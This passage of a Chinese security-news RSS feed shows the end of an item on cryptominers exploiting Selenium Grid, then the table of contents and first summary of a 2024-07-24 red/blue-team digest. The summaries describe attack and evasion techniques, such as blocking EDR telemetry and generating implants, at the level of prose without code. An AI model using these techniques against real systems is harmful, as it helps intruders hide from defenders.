		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">「编者注」:这玩意还有些类似的，以前好像叫 seleniumHQ 吧，确实攻击面可能从2016左右就开始了，以前测评过一波，黑灰amazon刷dan当时很多用这个的.</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">新型挖矿攻击利用Selenium Grid漏洞，攻击者使用新技术</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFuaQQCQ8FxNtHxqmeZmHgJEpuF3uQHkFicaE0BlB5rH2kkfXpE2hsPDQ/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmUzTB0pLOicuUMdxfdo1ZNFuaQQCQ8FxNtHxqmeZmHgJEpuF3uQHkFicaE0BlB5rH2kkfXpE2hsPDQ/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1522822222548242"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Selenium Grid 服务的默认配置不包含认证机制，这使得许多实例容易被恶意利用。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">威胁行为者通过 Selenium WebDriver API 的特性，实现了在受害服务器上运行 Python 脚本，进而部署挖矿软件。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">该恶意活动采用了多种 防御演asion技术，如使用自定义 UPX 头部打包矿工，以及避免硬编码矿池代理 IP 地址。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">尽管 Selenium Grid 的官方文档警告 不要将服务暴露在互联网上，但许多用户仍然忽略了这一点。</section></li></ul>
	<br/>
	<p>🏷️: Selenium, 加密货币挖矿, 网络安全, 威胁攻击</p></section><p><br/></p><figure style="-webkit-text-stroke-width: 0px;align-items: center;background-color: rgb(255, 255, 255);box-sizing: border-box;color: rgba(0, 0, 0, 0.85);display: flex;flex-direction: column;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;font-style: normal;font-variant-caps: normal;font-variant-ligatures: normal;font-weight: 400;justify-content: center;letter-spacing: normal;margin: 10px 0px;orphans: 2;padding: 0px;text-align: start;text-decoration-color: initial;text-decoration-style: initial;text-decoration-thickness: initial;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;">
	<figure><img class="js_asyningdom rich_pages wxw-img" data-ratio="1.5548387096774194" width="300" data-w="930" height="420" style="border-radius: 4px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing: border-box;display: block;margin: 0px;max-width: 100%;object-fit: fill;vertical-align: middle;" src="https://wechat2rss.xlab.app/img-proxy/?k=5afdb0e5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46vfEibIH57REKzBPUKgDubRickg6g44OtmibSJ6Gaibr8icCItHpX9WyoJJw%2F640%3Fwx_fmt%3Djpeg"/></figure>
	<figcaption style="align-items:center;background-color:rgba(0, 0, 0, 0.7);box-sizing:border-box;color:white;display:flex;font-size:14px;font-weight:normal;justify-content:center;letter-spacing:0em;line-height:35px;margin:-35px 0px 0px;padding:0px;text-align:center;width:304px;z-index:20;">
		快来和老司机们一起学习吧</figcaption></figure><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="2247487685">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=4fc9d304&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487685%26idx%3D1%26sn%3D7eb34d26696d991deb33192ae556c622%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 26 Jul 2024 16:39:00 +0800</pubDate>
    </item>
    <item>
      <title>「推安早报」0724 signal反制/wathsapp反制/LangChain风险/红队工具</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487679&amp;idx=1&amp;sn=7e802630f8041f90bdddc6a282aa66f7</link>
      <description>EDR遥测面临新型攻击威胁，WebRTC爆出远程代码执行漏洞，LangChain框架存在安全隐患，同时多款安全工具发布，助力安全研究与防御。</description>
      <content:encoded><![CDATA[<p>
<span>bggsec</span> <span>2024-07-24 11:37</span> <span style="display: inline-block;">北京</span>
</p>

<p>EDR遥测面临新型攻击威胁，WebRTC爆出远程代码执行漏洞，LangChain框架存在安全隐患，同时多款安全工具发布，助力安全研究与防御。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=8e9386d4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46Y82W05NaSKtPqZAIYtvicolsbBc9s2j9kB23fAwd8QgB6WWCnprkptw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;">
	<h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 100%;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;">2024-07-24 「红蓝热点」<span style="color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span><span style="display: none;"></span></h1>
	<blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			1. 推送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">「新、热、赞」</code>，帮部分人<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">阅读提效</code><br/>
			2. 学有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">精读浅读深读</code>，艺有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">会熟精绝化</code>，觉知此事<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">重躬行</code>。推送只在<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">浅读预览</code><br/>
			3. 机读为主，人工辅助，每日数万网站，10w推特速读<br/>
			4. 推送可能<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">大众或小众</code>，不代表本人偏好或认可<br/>
			5. 因渲染和外链原因，公众号<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">甲方安全建设</code>发送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">日报</code>或日期,如<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">20240724</code>获取<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">图文评论版pdf</code>
		</p>
	</blockquote>   <h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;"><span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">目录</span></h3><blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span><p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">0x01 【2024-0723】通过中间人网络过滤攻击有效阻止EDR遥测<br/>0x02 【2024-0723】EDR遥测数据拦截器<br/>0x03 【2024-0723】WebRTC安全漏洞研究：远程代码执行风险<br/>0x04 【2024-0724】LangChain开源生成式AI框架中的漏洞<br/>0x05 【2024-0724】高级SQL注入技术<br/>0x06 【2024-0724】macOS Sequoia 15 Beta 4 SDK更新与SwiftUI改进<br/>0x07 【2024-0724】攻击活动目录：从0到0.9<br/>0x08 【2024-0724】FlowAnalyzer：OAuth 2.0和OpenID Connect流分析工具<br/>0x09 【2024-0724】SCCMHunter：简化SCCM资产识别与攻击的工具<br/>0x0a 【2024-0724】PumpBin：植入生成平台<br/>0x0b 【2024-0724】WhatsApp漏洞：Android恶意软件伪装成PDF文件<br/></p></blockquote>
	<h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x01
			 通过中间人网络过滤攻击有效阻止EDR遥测</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">网页主要介绍了如何通过实施人在中间（PitM）攻击和过滤电子防御响应（EDR）遥测数据包来有效地阻止EDR遥测到达云服务器，从而隐藏安全操作中心（SOC）团队的警报。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.6112903225806452" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="620" src="https://wechat2rss.xlab.app/img-proxy/?k=f1c45a05&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmwZuG4Yf5KAoarDAr2Ip46SHwH3AfS7axUCHJKA0mABSC06tW5ENfzGK3wOhbBlAed0rRk3gAj1Q%2F640%3Ffrom%3Dappmsg"/>
	
